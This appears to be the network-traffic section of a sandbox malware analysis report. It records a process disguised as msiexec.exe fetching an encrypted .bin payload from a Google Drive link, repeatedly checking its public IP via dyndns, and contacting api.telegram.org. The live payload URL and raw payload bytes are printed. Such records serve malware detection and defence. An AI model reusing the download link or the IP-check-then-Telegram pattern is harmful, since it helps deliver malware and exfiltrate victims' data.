Dec 24, 2024 11:28:25.226165056 CET	1.1.1.1	192.168.2.9	0x3941	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:25.226165056 CET	1.1.1.1	192.168.2.9	0x3941	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:25.226165056 CET	1.1.1.1	192.168.2.9	0x3941	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:25.226165056 CET	1.1.1.1	192.168.2.9	0x3941	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:25.226165056 CET	1.1.1.1	192.168.2.9	0x3941	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:27.446676970 CET	1.1.1.1	192.168.2.9	0xa69c	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:27.446676970 CET	1.1.1.1	192.168.2.9	0xa69c	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:52.772417068 CET	1.1.1.1	192.168.2.9	0x1691	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49881	193.122.6.168	80	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 11:28:25.351393938 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 24, 2024 11:28:26.620445967 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 24, 2024 11:28:26.623927116 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 24, 2024 11:28:27.031100988 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 24, 2024 11:28:29.132431030 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 24, 2024 11:28:29.537750006 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49898	193.122.6.168	80	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 11:28:31.327245951 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 24, 2024 11:28:32.596045971 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49907	193.122.6.168	80	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 11:28:34.384279013 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 24, 2024 11:28:35.653840065 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49917	193.122.6.168	80	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 11:28:37.436908007 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 24, 2024 11:28:38.704668999 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49925	193.122.6.168	80	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 11:28:40.489877939 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 24, 2024 11:28:41.757795095 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49933	193.122.6.168	80	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 11:28:43.544482946 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 24, 2024 11:28:44.820162058 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49944	193.122.6.168	80	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 11:28:46.632821083 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 24, 2024 11:28:47.898505926 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49952	193.122.6.168	80	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 11:28:49.675983906 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 24, 2024 11:28:50.945177078 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 10:28:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49859	172.217.19.238	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:18 UTC	216	OUT	GET /uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-24 10:28:19 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 24 Dec 2024 10:28:18 GMT Location: https://drive.usercontent.google.com/download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-YIPnytiK8t_BNil6_-0w_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49866	142.250.181.1	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:21 UTC	258	OUT	GET /download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-24 10:28:24 UTC	4942	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC5o8fsKEGNcuW5imdVA6bWAFJq27GWtT6UhS1bh4SrwQgE51917H4dRQphtPp1PgexncYjq4u0 Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="dBnTcfeWuIVk46.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Mon, 23 Dec 2024 10:16:28 GMT Date: Tue, 24 Dec 2024 10:28:23 GMT Expires: Tue, 24 Dec 2024 10:28:23 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=opvYFw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-24 10:28:24 UTC	4942	IN	Data Raw: 25 49 c1 25 9e 9e d5 f7 48 fc a5 19 1c 41 c4 80 3b 4a ce ac 07 a9 59 58 b9 c1 3e 50 11 8f 3c 77 4e 75 7c f0 95 d9 de 83 f7 14 80 29 89 0d b7 0a bf 45 b8 15 5b 40 1c 4d 80 2e c1 06 31 b9 e5 35 05 55 fe f5 0b 48 0f 50 b3 f7 07 5f 78 1b 20 30 61 9f c0 46 3a 23 6c cf 7f d5 46 57 52 06 65 5b 77 f6 c0 3a 94 f1 c3 1e b5 75 22 e7 f5 a0 4a 33 36 2d 3a 24 3d ea fd db d9 5d 25 54 0e 59 f6 88 c2 b7 6a ab f7 b5 a4 8e f3 27 92 64 fa fb ae b0 27 22 bd 9e 72 57 ac 76 7f 34 09 56 8d 03 d1 38 9b c3 9c ad c5 9f c0 ae 7f 07 b1 6e 32 79 d3 ed 4f 58 7b b9 02 c9 5d 90 5b 29 1f 53 79 aa 31 51 ab ca 65 90 49 aa 0b b1 8f 42 93 22 9f 33 65 40 da ad 32 9a 2d 7a af 6c 69 46 87 cd 43 05 16 d1 a6 bf 12 12 fd 93 f5 c6 df f4 87 c6 f4 fb 96 bf ea cd 44 42 b0 b3 7d d9 4b a7 32 4f ef b5 cb Data Ascii: %I%HA;JYX>P<wNu\|)E[@M.15UHP_x 0aF:#lFWRe[w:u"J36-:$=]%TYj'd'"rWv4V8n2yOX{][)Sy1QeIB"3e@2-zliFCDB}K2O
2024-12-24 10:28:24 UTC	4812	IN	Data Raw: bc 39 10 5d 9e 5e 9d 46 80 e6 07 17 1f f5 1d eb 83 39 ce 08 21 e7 74 90 47 cc 2e 65 65 c4 96 20 47 5c b7 7b 8f 11 e6 a1 e2 1a 8c 49 1d e4 d1 16 e6 d5 54 59 85 0e 4c 12 00 21 71 11 41 f7 f7 57 69 cc ae b1 c4 76 73 71 ad 48 a8 0e 0e 32 b4 36 00 30 cc b1 36 c1 f0 da da 90 d9 d7 85 f2 82 8a b7 1e e6 9a 79 34 30 18 3d a7 f6 73 29 c3 91 3d 15 57 b0 d8 0d 5c b7 98 91 7a f8 51 34 77 22 d0 6e d0 0f 6a 69 3c 18 a3 c9 07 9c 9d cb 56 e8 f6 f5 8b 29 0c ff a4 28 bf 20 cd 99 c1 0e 72 27 06 99 98 49 6e dc c3 76 7d 5d 9e c0 df a1 0a 59 0a 5f be 10 65 2a a1 7e 11 69 a6 c6 92 ff 1d f5 80 a2 19 04 9f f4 21 e7 f5 94 73 2f ed 17 cb c7 a6 26 da 64 99 90 85 2e 2c 5f 2c 6f 47 1b 9d d3 26 21 0b f4 69 5f d5 49 af a9 b4 76 93 95 98 a0 46 cf 6e fd ca f1 f6 ee 0f d9 b0 28 89 7c 65 9c Data Ascii: 9]^F9!tG.ee G\{ITYL!qAWivsqH2606y40=s)=W\zQ4w"nji<V)( r'Inv}]Y_e*~i!s/&d.,_,oG&!i_IvFn(\|e
2024-12-24 10:28:24 UTC	1324	IN	Data Raw: ce b5 63 8d 3a 0a dc 4c b6 fe 28 ac ee ec 5c 1b 36 62 d0 05 00 8c a2 7f 8a 84 7f 33 94 7c 07 a6 60 5b dd fb ae 0c 3e b5 8c c4 01 19 3c 45 f7 63 7e 65 a0 29 91 65 46 d4 95 69 0c bb 35 22 dc 34 da 0d df 23 7e 65 5e a0 71 2d ae d3 aa 78 9e 50 9d e4 1d 5e c6 aa 9d 71 38 ea 81 4e 3a c3 0d 41 2d 7a de f8 ee f8 db 76 1d 07 68 d6 bd 46 6b a8 a0 77 51 fe 37 fa d9 fb f7 64 73 3c 41 f1 ff f2 13 86 88 34 58 d9 5f 54 17 28 2d 9b 65 09 46 54 ce c4 4f 38 90 d4 93 11 e3 97 cf 35 44 77 ec be 47 3d e8 2c 6a 40 79 2e 00 19 4a bd e1 2c 9e 48 b8 2e 5e 99 c9 38 83 27 17 9d d1 0b bd f1 bb 13 8b cd b3 6c 76 45 fb d1 79 f2 f8 6b 76 96 f5 0d a5 25 42 e2 ff a5 5f 94 b0 b7 c9 72 67 65 11 ef c4 c1 68 96 2e cf 44 dd b1 76 3f f4 8f e9 52 7e 25 24 f2 c2 9c c9 5d b8 31 79 78 2d be e7 b0 Data Ascii: c:L(\6b3\|`[><Ec~e)eFi5"4#~e^q-xP^q8N:A-zvhFkwQ7ds<A4X_T(-eFTO85DwG=,j@y.J,H.^8'lvEykv%B_rgeh.Dv?R~%$]1yx-
2024-12-24 10:28:24 UTC	1390	IN	Data Raw: 99 fd 73 3b 35 3b 04 52 36 98 2e d1 40 aa 1f f6 f6 7b b1 d4 ae 7d 81 05 1e bd cd 1a 60 2b c7 f4 f4 cf 14 38 fb dd 20 6e fb 2d 2c 77 1c e0 02 2c ff a6 e7 ed 2e de 0f 70 85 ed ca 41 1e 6f b1 20 83 1d 14 dc 88 fc 2a 3d c4 fd c7 cb a0 32 9c b3 6e c3 f6 51 36 7a 77 2c 8d 78 2a 5a 6e 73 e8 7f 4f f9 c0 5e b0 e4 ef b6 a3 e4 08 9e 14 73 88 82 44 eb 47 da 48 b9 96 f7 a2 8b 3a 5d b6 f0 69 e8 3c d0 eb 9f 8a ca 24 17 85 48 a0 c3 3a de 14 a5 49 ff 2b 34 c1 a6 6f 2c f9 39 b3 1b 62 bf 1a 53 6c 1d b3 2f 1a 19 ae 68 75 b9 6c 73 40 0b f5 65 cb ef df b3 d9 3f 7c 76 79 b8 0b 09 55 e7 a1 65 99 3a d3 03 d4 e5 1b 33 f5 4a 66 cf 7b 4f c3 1a bc ff 56 96 3f 03 60 78 93 50 8d 26 05 b1 33 d8 de f7 96 78 98 65 1f 27 23 9d e6 9b 41 eb 88 49 22 d9 92 57 3d ee 97 ce e7 a6 1a f1 b2 5b c0 Data Ascii: s;5;R6.@{}`+8 n-,w,.pAo =2nQ6zw,xZnsO^sDGH:]i<$H:I+4o,9bSl/huls@e?\|vyUe:3Jf{OV?`xP&3xe'#AI"W=[
2024-12-24 10:28:24 UTC	1390	IN	Data Raw: 6e 45 c0 e4 75 b1 47 bf 89 b4 00 c2 72 4e 78 8d cd fc 88 1c ee b9 34 d8 8a 01 74 3a 53 fa 45 e8 e2 17 14 95 9b 9b 34 ff 28 0f 15 d2 fb 81 2d 2b 79 59 09 01 24 08 48 05 41 b0 98 d4 5f 87 ee 20 4e e5 9f c0 42 49 ea 6c cf 35 c6 4e 29 63 06 65 5f 05 63 c2 3a e4 e7 eb 9f b5 75 28 f1 0b a1 59 3a 27 24 16 28 2c e2 ea b4 13 5d 25 5e 8e 59 dd 83 cc b9 d8 b3 98 cb ad 43 d8 9f 93 39 3f a4 c4 d8 4e 55 b5 25 00 38 c1 6b d2 59 29 3f ec 7c b7 29 d5 e3 fe cc 9b d6 b5 c0 5b 1d 63 4e 76 3c ef 00 22 37 15 dc 3d cc 41 9c 10 e7 1f 53 73 aa 20 57 94 40 65 90 0f ab 20 d5 56 c7 05 44 41 23 40 68 ee ad 32 90 de 70 ad 45 00 47 d7 c7 9d 21 12 d1 a6 d5 27 12 fd 97 87 53 a3 b7 f3 d0 dc 5a 96 bf e0 bb be 43 a3 b8 2c d2 72 4c 33 4f ef c9 e0 0d 49 cc e0 c9 47 63 e1 67 64 20 49 44 3a ad Data Ascii: nEuGrNx4t:SE4(-+yY$HA_ NBIl5N)ce_c:u(Y:'$(,]%^YC9?NU%8kY)?\|)[cNv<"7=ASs W@e VDA#@h2pEG!'SZC,rL3OIGcgd ID:
2024-12-24 10:28:24 UTC	1390	IN	Data Raw: e1 50 8b 77 c5 2e a1 62 c4 94 00 47 5c 0b 7a f1 0d fd a1 e6 75 aa 48 1d ee ad 4c e7 d5 24 4f ad 8f 4c 12 0a 37 8e 12 4b f1 19 f4 6e cc 76 ce f7 76 63 75 df dd ef 0e 7e 25 87 87 03 30 77 a7 c8 c0 e8 dd e3 a5 d8 d7 ad 85 52 df bd 15 e0 9a 0e 34 30 18 4c e3 ba 73 59 de 73 5a 15 57 bb fd 1c 3d e3 15 ce 7e d0 54 5b 12 24 bf dd d0 08 67 74 7d 0d a3 b3 28 a8 fa cb 5c 9c d2 9d 8b 2d 2e b9 a4 5b dc 5e d2 93 d2 0e 5a 7c 02 91 85 98 10 c8 d7 54 d4 58 9e db ae 51 61 59 0b 59 ad 1e 06 45 b3 11 0d 06 1d cc 92 2b 13 fd ef e6 35 0c 8a 8c 0d e6 f5 90 0a 93 31 06 c5 c7 76 26 da 64 94 66 d1 2e 3d 50 1d ea 16 1e f2 d3 03 37 73 ef a0 81 ab eb 9b ba b0 ca 82 91 fd 03 63 d7 16 9a 19 f8 ae 22 2a c0 c4 1a 57 70 61 39 15 83 a5 a1 d8 d5 b9 29 79 86 be d2 da e2 b0 73 8f a6 f0 ca 03 Data Ascii: Pw.bG\zuHL$OL7Knvvcu~%0wR40LsYsZW=~T[$gt}(\-.[^Z\|TXQaYYE+51v&df.=P7sc"*Wpa9)ys
2024-12-24 10:28:24 UTC	1390	IN	Data Raw: 1d d5 10 34 94 e2 5e cf 43 65 4f 34 2d 31 bd eb 49 4a 55 a9 38 31 23 c1 25 04 67 06 87 bf 84 ab 83 fc 1c 9a a6 7e 92 61 6d 45 d1 79 c0 99 4e 6e e4 92 02 b3 7d 96 c7 e6 d1 67 b4 b0 bf 6b 57 55 60 9a e0 ce b1 d6 3e 75 b1 6e dc 94 64 ef 77 98 9b bb 59 64 54 50 ec 4b ec 4a cc 1b b1 78 29 16 c2 d6 a5 6e 87 07 50 61 98 67 b8 11 e6 9e 9a 55 24 ab 33 83 ec 1d 4e f1 73 82 2f a5 cb b4 7a 91 13 9f de 3e fb 93 94 50 d8 5f c4 a1 20 d6 37 c1 9d 6d 6e 9e a2 74 3a f8 fb 94 10 6f 90 d7 84 35 3a 36 46 eb c0 7f ce be 20 5d 4a d8 61 c1 a5 9b 45 94 b0 b4 47 6c 89 72 d0 ae 04 fb 8f 6d 72 a0 06 ee a8 e8 e4 e8 65 82 7b 49 45 23 0b 31 78 fc 82 14 24 ed 63 4b 07 1b b2 27 35 ef f8 97 7a 5d 69 8a e7 10 7a 30 a9 ff 19 db 44 b9 8e ed b3 e2 2d e3 1c 74 91 93 1f bf 99 dd 64 62 5e 6d 2f Data Ascii: 4^CeO4-1IJU81#%g~amEyNn}gkWU`>undwYdTPKJx)nPagU$3Ns/z>P_ 7mnt:o5:6F ]JaEGlrmre{IE#1x$cK'5z]iz0D-tdb^m/
